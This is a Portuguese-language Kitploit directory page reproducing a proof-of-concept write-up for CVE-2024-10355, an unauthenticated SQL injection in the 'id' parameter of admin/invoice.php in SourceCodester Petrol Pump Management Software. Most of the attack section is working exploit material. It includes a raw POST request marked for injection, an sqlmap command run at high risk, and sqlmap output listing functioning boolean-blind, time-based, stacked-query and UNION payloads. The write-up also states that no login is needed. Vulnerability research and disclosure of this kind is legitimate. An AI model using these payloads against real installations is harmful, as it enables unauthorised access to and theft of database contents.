Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-10355 — Reprodução e análise de CVE-2024-10355, uma vulnerabilidade de injeção SQL não autenticada no SourceCodester Petrol Pump Management Software, com payloads de prova de conceito e etapas de exploração. | Kitploit
Ferramentas/GitHubGitHub/k1nakoo/cve-2024-10355
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubk1nakoo/cve-2024-10355

CVE-2024-10355

Reprodução e análise de CVE-2024-10355, uma vulnerabilidade de injeção SQL não autenticada no SourceCodester Petrol Pump Management Software, com payloads de prova de conceito e etapas de exploração.

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Código-fonte

Download gratuito do software de gerenciamento de bombas de gasolina | SourceCodester

Descrição

Vulnerabilidade de SQL Injection no software de gerenciamento de bombas de gasolina sourcecodester v1.0. Foi encontrada uma vulnerabilidade classificada como de alto risco, afetando alguma funcionalidade desconhecida do arquivo admin\invoice.php. Usando o parâmetro id para construir instruções SQL maliciosas e obter informações sensíveis, causando danos.

Análise da vulnerabilidade

admin\invoice.php

image-20241023165652040

Aqui, a entrada do usuário $_POST['id'] é concatenada na instrução da consulta SQL, o que é obviamente suscetível a ataques de injeção de SQL.

Reprodução da vulnerabilidade

image-20241023165723658

root@kitploit:~
POST /admin/invoice.php HTTP/1.1
Host: 10.151.167.168:6677
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 50

id=1*

Salve o pacote e use o sqlmap para atacar

root@kitploit:~
python3 sqlmap.py --random-agent -r data.txt --risk 3 --batch

image-20241023165827647

root@kitploit:~
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: id=-6094' OR 1911=1911 AND 'hAoG'='hAoG

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: id=1';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1041 FROM (SELECT(SLEEP(5)))UTeR) AND 'HnhT'='HnhT

    Type: UNION query
    Title: Generic UNION query (NULL) - 16 columns
    Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176626b71,0x6b57657774656652476e4d594f6959545363546f73424a4c547364484a4d47696247447769514653,0x71766b6a71),NULL,NULL,NULL,NULL,NULL,NULL-- -
---

Observe o pacote: não adicionei um valor de cookie, indicando que não há autenticação — não é necessário fazer login para lançar ataques remotamente.

Você pode ver que esse payload utiliza dois métodos de injeção, time-based blind, boolean-based blind, stacked queries e UNION query, e injeta com sucesso o nome do banco de dados.

Baixar ferramenta